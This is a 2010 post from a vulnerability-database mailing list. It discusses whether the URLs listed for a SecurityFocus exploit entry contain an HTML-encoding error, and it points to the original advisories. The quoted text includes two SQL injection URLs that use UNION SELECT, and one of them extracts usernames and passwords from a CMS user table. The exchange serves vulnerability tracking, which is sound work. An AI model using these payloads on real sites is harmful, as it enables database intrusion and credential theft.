[VIM] BID 31930 exploit
George A. Theall
theall at tenable.com
Thu Nov 18 19:46:31 CST 2010
On Nov 18, 2010, at 5:10 AM, security curmudgeon wrote:
>
> http://www.securityfocus.com/bid/31930/exploit
>
> http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION
> %20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),
> 0,0,0,0,0,0,0,0,0%20FROM%20default_users
>
> http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION
> ALL SELECT 0,0,0,0,0,version()--
>
> --
>
> Just want to confirm, it appears the "&" is actually some HTML
> decoding snafu that is essentially doing & and an encoded &? Seems
> like that should be "&nid=" in the first example and "&cpage" in the
> second?
Seems to be in error in the BID -- look at the advisory on Packet
Storm and SecurityReason:
http://packetstormsecurity.org/files/view/71280/tandiscms-sql.txt
http://securityreason.com/exploitalert/5013
George
--
theall at tenablesecurity.com